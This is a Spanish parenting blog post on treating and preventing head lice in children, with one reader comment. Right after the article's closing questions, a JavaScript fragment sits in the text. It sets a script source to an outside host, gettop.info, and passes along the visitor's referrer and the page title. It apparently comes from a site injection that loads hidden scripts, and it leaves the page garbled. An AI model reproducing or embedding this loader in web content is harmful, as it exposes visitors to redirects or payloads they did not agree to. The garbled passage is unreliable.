Salud y belleza » Niños, Salud

Mi hijo tiene piojos, ¿qué hago?

1 Comentario

pediculosisLa pediculosis o infestación por piojos es muy común entre niños y niñas, sea cual sea su clase social, sobre todo en los colegios y en épocas de más calor. Son pequeños insectos que se alimentan de la sangre del cuero cabelludo y que se reproducen muy rápidamente. Muerden la piel y sueltan una sustancia que causa picor en la cabeza. Normalmente suelen provocar problemas cutáneos y en muy pocas ocasiones suelen transmitir enfermedades. Por ello es importante vigilar siempre la cabeza de los más pequeños para comprobar que no tengan piojos ni liendres (que son los huevos de los piojos).

Para prevenir lo mejor es tener una buena higiene capilar y en general, lavar con frecuencia el pelo, peinarlo, limpiar a menudo peines y cepillos y controlar la cabeza de los hijos, sobre todo detrás de las orejas y en la nuca. También es importante enseñar a los niños lo importante de la higiene personal y que no presten peines, cepillos, sombreros, etc. a otros.

Si su hijo o hija tiene piojos lo mejor es:

  • lavar-cabezaApartarlo del resto de la gente mientras dure el tratamiento para evitar infectar a los demás.
  • Después debe aplicarle alguna loción o champú antiparasitario que encontrará en la farmacia y seguir las instrucciones del mismo.
  • Lo mejor es usar guantes para las manos y un gorro de plástico para la cabeza.
  • Además de la loción, el vinagre repele y previene las liendres.
  • Una vez aclarado el pelo y el cuerpo se debe usar un cepillo para quitar las liendres y piojos (suelen ser cepillos de púas juntas y pequeñas, especiales para ello).
  • Los peines y todos los accesorios del pelo se deben lavar y sumergir en un cubo con loción antipiojos también.
  • Lavar la ropa, fundas de sofá, de cama, etc. con agua caliente.
  • Se debe avisar al colegio o a los padres de los niños que hayan estado junto al suyo.

peine-piojosUna vez hechos todos estos pasos lo mejor es repetir el mismo procedimiento al cabo de una semana para quitar todas las liendres y piojos que hayan sobrevivido. Para seguir previniendo mientras que haya peligro en el colegio lo mejor es aplicar colonias repelentes o lavarse el cabello con vinagre para repeler a los piojos.  Aunque es mejor no abusar puesto que estos productos tienen efectos secundarios y son perjudiciales para el cuero cabelludo y para la salud capilar.

Aún así siempre se corre el riesgo de coger piojos, puesto que no hay ningún método efectivo que prevenga los piojos.

¿Has tenido alguna vez piojos? ¿Y tus hij@s? ¿Qué has hecho?} else {s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , , , ,

One Comment »

  • Xoana said:

    Mi hija tiene piojos casi cada año del colegio. tiene mucha cantidad de pelo por lo que se convierte en un gran problema. ¿Me recomiendan algún producto para repeler que no sea muy fuerte ni perjudicial?
    Gracias y saludos

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.